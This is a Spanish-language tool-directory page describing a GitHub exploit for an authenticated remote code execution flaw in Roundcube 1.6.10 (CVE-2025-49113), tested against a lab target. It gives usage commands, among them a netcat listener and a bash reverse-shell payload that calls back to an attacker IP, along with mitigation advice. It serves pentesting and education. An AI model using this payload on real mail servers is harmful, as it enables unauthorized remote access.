Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-49113-Roundcube_1.6.10 — Exploit de ejecución remota de código autenticado para Roundcube 1.6.10 (CVE-2025-49113). Entrega una reverse shell a través de un payload PHP manipulado mediante la interfaz de webmail. | Kitploit
Herramientas/GitHubGitHub/cyberquestor-infosec/cve-2025-49113-roundcube_1.6.10
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHubcyberquestor-infosec/cve-2025-49113-roundcube_1.6.10

CVE-2025-49113-Roundcube_1.6.10

Exploit de ejecución remota de código autenticado para Roundcube 1.6.10 (CVE-2025-49113). Entrega una reverse shell a través de un payload PHP manipulado mediante la interfaz de webmail.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 1 añoAún no revisado

CVE-2025-49113 – Roundcube 1.6.10 Ejecución Remota de Código Autenticada

⚠️ Aviso
Este repositorio está destinado exclusivamente para fines educativos y de investigación.
Todas las demostraciones se realizaron en un entorno de laboratorio controlado.
El uso no autorizado de pruebas o la explotación de sistemas sin permiso explícito es ilegal y poco ético. El autor no se hace responsable por el mal uso de esta información.


📌 ¿Qué es Roundcube?

Roundcube es un cliente de correo electrónico IMAP basado en navegador, ampliamente utilizado y escrito en PHP. Proporciona una interfaz amigable para el acceso al correo web y es comúnmente implementado por proveedores de alojamiento, instituciones académicas y servidores de correo empresarial internos.


🚨 Sobre la Vulnerabilidad

CVE-2025-49113 es una vulnerabilidad que afecta a Roundcube versión 1.6.10 y permite a un usuario autenticado lograr ejecución remota de código (RCE) enviando un comando manipulado a través de la interfaz de correo web.

La explotación exitosa requiere credenciales de usuario válidas. Una vez explotada, concede la ejecución de comandos a nivel de sistema según el contexto del servidor web.

  • ID de CVE: CVE-2025-49113
  • Aplicación afectada: Roundcube 1.6.10
  • Tipo de vulnerabilidad: Ejecución Remota de Código Autenticada
  • Tipo de explotación: Shell inversa a través de payload PHP
  • Disponibilidad del exploit: PoC público en GitHub

⚙️ Configuración del Laboratorio

  • URL objetivo: http://mail.outbound.htb
  • Versión de Roundcube: 1.6.10
  • Listener: Netcat en el puerto 4444
  • Exploit: CVE-2025-49113.php

🚀 Uso del Exploit

1. Iniciar el Listener de Netcat

root@kitploit:~
nc -nlvp 4444

2. Ejecutar el Exploit

root@kitploit:~
php CVE-2025-49113.php {url} {usuario} {contraseña} "bash -c 'bash -i >& /dev/tcp/<TU-IP>/4444 0>&1'"

🔧 Reemplaza <TU-IP> con la IP de tu atacante.


📸 Demostración

Salida del Script de Exploit

Ejecución del script de exploit

Shell Inversa Capturada

Listener de shell inversa


🔐 Mitigación

  • Actualiza Roundcube a la última versión estable y segura.
  • Elimina o restringe el acceso de los usuarios a los componentes vulnerables.
  • Aplica controles de acceso estrictos y listas blancas de IP para las interfaces de correo web.
  • Supervisa los registros de autenticación en busca de anomalías.
  • Aplica principios de privilegios mínimos en los entornos de servidor web.

📝 Notas

  • El exploit requiere autenticación.
  • Solo se ha probado contra Roundcube 1.6.10.
  • El contexto de usuario del shell depende de la configuración del servidor.
  • La demostración se realizó en un entorno de laboratorio virtual.

📚 Referencias

  • Artículo de OffSec
  • Exploit público

📝 Blog en Medium

Consulta el análisis detallado y la teoría en mi artículo de Medium:
👉 Lee el blog en Medium

Descargar herramienta